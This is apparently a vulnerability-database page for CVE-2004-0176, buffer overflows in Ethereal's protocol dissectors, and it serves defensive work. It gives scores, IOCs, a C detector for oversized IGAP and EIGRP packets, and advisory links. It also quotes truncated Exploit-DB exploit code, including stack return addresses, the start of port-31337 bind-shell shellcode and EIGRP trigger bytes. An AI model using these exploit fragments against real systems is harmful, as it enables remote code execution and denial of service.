CVE-2004-0176 (published 2004-05-04)
Priority P3 · 43 · medium · CVSS 2.0 base score 5
AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS 67.09% (99.2nd percentile)
Multiple buffer overflows in Ethereal 0.8.13 to 0.10.2 allow remote attackers to cause a denial of service and possibly execute arbitrary code via the (1) NetFlow, (2) IGAP, (3) EIGRP, (4) PGM, (5) IrDA, (6) BGP, (7) ISUP, or (8) TCAP dissectors.
Affected (24 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ethereal_group | ethereal | — | — |
Detection & IOCs (extracted from sources)
bytes:
\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x39
- Detect oversized IGAP packets whose igap_msgsize field exceeds 0x40 (64 bytes): the exploit sets igap_msgsize = 0x40 + PAYLOAD_SIZE to overflow the dissector's fixed 64-byte message buffer.
- Detect an EIGRP IP Internal Routes TLV (type 0x0102) with a Length field of 0x0039 (57) where the expected value is 0x001C (28); this is what triggers the TLV_IP_INT overflow.
- Monitor for raw-socket (SOCK_RAW/IPPROTO_RAW) traffic carrying IGMP/IGAP (IP protocol 0x02) packets whose payload is significantly larger than the standard IGAP message structure (16 + 64 bytes).
- After successful exploitation, watch for a bind shell on port 31337 spawned by the shellcode embedded in the IGAP exploit payload.
- Note: the IGAP exploit requires root privileges on the attacking machine to open a raw socket (SOCK_RAW).
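The two packet-level checks in the IOC list above, written out as an added example (this is not code from the page, from Exploit-DB or from the Ethereal project): a small C detector that flags an IGAP message whose Message Size byte exceeds the 64-byte dissector buffer, and an EIGRP packet carrying an IP Internal Routes TLV (0x0102) whose declared length exceeds 0x1C, run over constructed samples that include the trigger bytes quoted above. Assumptions: the IGAP field offsets (a 16-byte fixed header with the Message Size byte at offset 14, followed by a 16-byte account and a 64-byte message) are taken from the IGAP Internet-Draft layout rather than from this page; the 0x1C threshold is the one the IOC states and should be confirmed against legitimate EIGRP traffic before it is deployed as a rule; the IPv4 sample datagram is built by a helper with a zero checksum; all function names are mine.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Bounds taken from the IOCs on this page: Ethereal's IGAP dissector copies the
 * message into a 64-byte buffer, and the EIGRP IP Internal Routes TLV (0x0102)
 * is expected to be 0x1C bytes long. */
#define IGAP_FIXED_HDR       16   /* assumed from the IGAP Internet-Draft layout */
#define IGAP_MSIZE_OFFSET    14   /* Message Size byte, same assumption */
#define IGAP_MESSAGE_MAX     64
#define IGAP_BODY_LEN        (IGAP_FIXED_HDR + 16 + IGAP_MESSAGE_MAX)
#define EIGRP_HDR_LEN        20
#define EIGRP_TLV_IP_INT     0x0102
#define EIGRP_TLV_IP_INT_LEN 0x1C

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* 1 = Message Size exceeds the 64-byte dissector buffer, 0 = in bounds,
 * -1 = too short to carry the IGAP fixed header. */
int igap_oversized(const uint8_t *igap, size_t len)
{
    if (len < IGAP_FIXED_HDR) return -1;
    return igap[IGAP_MSIZE_OFFSET] > IGAP_MESSAGE_MAX ? 1 : 0;
}

/* Demultiplex from an IPv4 datagram: only protocol 2 (IGMP, which IGAP rides on)
 * is inspected. Returns igap_oversized()'s verdict, or -1 if not IGMP / malformed. */
int ipv4_igap_oversized(const uint8_t *ip, size_t len)
{
    if (len < 20 || (ip[0] >> 4) != 4) return -1;
    size_t ihl = (size_t)(ip[0] & 0x0f) * 4;
    size_t total = be16(ip + 2);
    if (ihl < 20 || total < ihl || total > len || ip[9] != 2) return -1;
    return igap_oversized(ip + ihl, total - ihl);
}

/* Walk EIGRP TLVs after the 20-byte header. 1 = an IP Internal Routes TLV declares
 * a length above 0x1C (the overflow trigger), 0 = clean, -1 = broken TLV framing.
 * The oversized-length test runs before the framing test on purpose: the trigger
 * packet on this page is only 24 bytes long, so its TLV is also truncated. */
int eigrp_long_ip_int(const uint8_t *pkt, size_t len)
{
    if (len < EIGRP_HDR_LEN) return -1;
    size_t off = EIGRP_HDR_LEN;
    while (off + 4 <= len) {
        uint16_t type = be16(pkt + off), tlen = be16(pkt + off + 2);
        if (type == EIGRP_TLV_IP_INT && tlen > EIGRP_TLV_IP_INT_LEN) return 1;
        if (tlen < 4 || off + tlen > len) return -1;   /* length covers the 4-byte TLV header */
        off += tlen;
    }
    return off == len ? 0 : -1;
}

/* --- constructed samples, not captured traffic --- */

/* The trigger bytes quoted above: 20-byte EIGRP header, then TLV 0x0102 with length 0x39. */
const uint8_t eigrp_trigger[] = {
    0x01,0x04,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0x01,0x02,0x00,0x39
};
/* Same header, one IP Internal Routes TLV of the expected 0x1C bytes (body zeroed). */
const uint8_t eigrp_benign[EIGRP_HDR_LEN + EIGRP_TLV_IP_INT_LEN] = {
    [0] = 0x01, [1] = 0x04, [20] = 0x01, [21] = 0x02, [22] = 0x00, [23] = 0x1C
};
/* IGAP bodies: only the Message Size byte differs. The exploit sets it to 0x40 + payload size. */
const uint8_t igap_benign[IGAP_BODY_LEN]  = { [IGAP_MSIZE_OFFSET] = 0x05 };
const uint8_t igap_trigger[IGAP_BODY_LEN] = { [IGAP_MSIZE_OFFSET] = 0x40 + 0x10 };

/* Wrap an IGAP body in a minimal IPv4 header (protocol 2, checksum left zero: sample only).
 * Returns the datagram length written, or 0 if `out` is too small. */
size_t wrap_ipv4_igmp(uint8_t *out, size_t cap, const uint8_t *body, size_t blen)
{
    if (cap < 20 + blen || 20 + blen > 0xffff) return 0;
    memset(out, 0, 20);
    out[0] = 0x45;                                   /* IPv4, IHL 5 */
    out[2] = (uint8_t)((20 + blen) >> 8); out[3] = (uint8_t)(20 + blen);
    out[8] = 1; out[9] = 2;                          /* TTL 1, protocol IGMP */
    out[12] = 10; out[15] = 1;                       /* 10.0.0.1 -> 224.0.0.1 */
    out[16] = 224; out[19] = 1;
    memcpy(out + 20, body, blen);
    return 20 + blen;
}

/* Convenience for the IPv4 path: wraps `body` and returns ipv4_igap_oversized()'s verdict. */
int ipv4_verdict(const uint8_t *body, size_t blen)
{
    uint8_t dgram[20 + IGAP_BODY_LEN];
    size_t n = wrap_ipv4_igmp(dgram, sizeof dgram, body, blen);
    return n ? ipv4_igap_oversized(dgram, n) : -1;
}

int main(void)
{
    printf("EIGRP trigger: %d, benign: %d\n",
           eigrp_long_ip_int(eigrp_trigger, sizeof eigrp_trigger),
           eigrp_long_ip_int(eigrp_benign, sizeof eigrp_benign));
    printf("IGAP over IPv4 trigger: %d, benign: %d\n",
           ipv4_verdict(igap_trigger, sizeof igap_trigger),
           ipv4_verdict(igap_benign, sizeof igap_benign));
    return 0;
}
```

To run this over live traffic, hand each IPv4 datagram from a pcap or raw socket to ipv4_igap_oversized() and each EIGRP payload (IP protocol 88) to eigrp_long_ip_int(); a return of 1 is the IOC, while -1 means the bytes did not parse as that protocol at all and deserve a separate malformed-packet alert rather than silence.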
CVSS provenance
- nvd: v2.0, 5.0 MEDIUM, AV:N/AC:L/Au:N/C:N/I:N/A:P
- vendor_redhat: 5.0 MEDIUM
GHSA
GHSA-rfxc-wgf7-qphr: Multiple buffer overflows in Ethereal 0
ghsa_unreviewed · 2022-04-29 · MEDIUM
Red Hat
security flaw
vendor_redhat · 2004-03-04 · CVSS 5.0 · MEDIUM
Exploit-DB
Ethereal 0.10.0 < 0.10.2 - IGAP Overflow
exploitdb · 2004-03-28

```c
#include
#include
#include
#include
#include
#include

#define MAX_ARCH 5

/* Per-target return address into the stack: one entry per tethereal/ethereal build */
struct eos {
    char *arch;
    unsigned long ret;
} targets[] = {
    { "tEthereal(0.10.2)-Gentoo(gdb)", 0xbffede50 },
    //-------------------------------
    { "tEthereal(0.10.2)-Gentoo ",     0xbffede10 },
    //-------------------------------
    { "Ethereal(0.10.2)-Gentoo ",      0xbfffd560 },
    //-------------------------------
    { "tEthereal(0.10.2)-RedHat 8 ",   0xbffedfb8 },
    //-------------------------------
    { "Ethereal(0.10.2)-RedHat 8 ",    0xbfffcd08 },
    //-------------------------------
    { NULL, 0 }
};

/*
 * x86 Linux port-bind shell on port 31337
 * based on shellcode from www.shellcode.com.ar
 * with a few modifications by us
 */
char shellcode_firsthalf[] =
    /* sys_fork() */
    "\x31\xc0"   // xorl %eax,%eax
    "\x31\xdb"   // xorl %ebx,%ebx
    "\xb0\x02"   // movb $0x2,%al
    "\
```
Exploit-DB
Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service
exploitdb · 2004-03-26

```c
/*
 * Ethereal network protocol analyzer
 * EIGRP Dissector TLV_IP_INT Long IP Address Overflow
 * vulnerability
 * proof of concept code
 * version 1.0 (Mar 26 2004)
 *
 * by Rémi Denis-Courmont
 * www simphalempin com dev
 *
 * This vulnerability was found by:
 * Stefan Esser s.esser e-matters de
 * whose original advisory may be fetched from:
 * http://security.e-matters.de/advisories/032004.html
 *
 * Vulnerable:
 * - Ethereal v0.10.2
 *
 * Not vulnerable:
 * - Ethereal v0.10.3
 *
 * Note: this code will simply trigger a denial of service on Ethereal.
 * It should really be possible to exploit the buffer overflow
 * (apparently up to 29 bytes overflow), but I haven't tried.
 */
#include
#include
#include
#include
#include
#include
#includ
```
Bugzilla
CVE-2004-0176 security flaw
bugzilla · 2018-08-16 · CVSS 5.0 · MEDIUM
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Bugzilla
CAN-2004-0176 Ethereal dissector overflows
bugzilla · 2004-03-12 · MEDIUM
Stefan Esser reported that Ethereal versions 0.10.1 and earlier contain stack overflows in the IGRP, PGM, NetFlow, ISUP, TCAP, or IGAP dissectors. On a system where Ethereal is being run a remote attacker could send malicious packets that could cause Ethereal to crash or execute arbitrary code. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-0176 to this issue.
Treating as embargoed.
CAN-2004-0176 Affects: 2.1AS 2.1ES 2.1WS 2.1AW
CAN-2004-0176 Affects: 3AS 3ES 3WS
Discussion:
no longer embargoed
---
An errata has been issued which should help the problem described in this bug report. This report is therefore being closed with a resolution of ERRATA. For more information on the solution and/or
References
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835
http://marc.info/?l=bugtraq&m=108007072215742&w=2
http://marc.info/?l=bugtraq&m=108058005324316&w=2
http://marc.info/?l=bugtraq&m=108213710306260&w=2
http://secunia.com/advisories/11185
http://security.e-matters.de/advisories/032004.html
http://security.gentoo.org/glsa/glsa-200403-07.xml
http://www.debian.org/security/2004/dsa-511
http://www.ethereal.com/appnotes/enpa-sa-00013.html
http://www.kb.cert.org/vuls/id/119876
http://www.kb.cert.org/vuls/id/125156
http://www.kb.cert.org/vuls/id/433596
http://www.kb.cert.org/vuls/id/591820
http://www.kb.cert.org/vuls/id/644886
http://www.kb.cert.org/vuls/id/659140
http://www.kb.cert.org/vuls/id/740188
http://www.kb.cert.org/vuls/id/864884
http://www.kb.cert.org/vuls/id/931588
http://www.mandriva.com/security/advisories?name=MDKSA-2004:024
http://www.osvdb.org/6893
http://www.redhat.com/support/errata/RHSA-2004-136.html
http://www.redhat.com/support/errata/RHSA-2004-137.html
https://exchange.xforce.ibmcloud.com/vulnerabilities/15569
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10187
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A878
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A887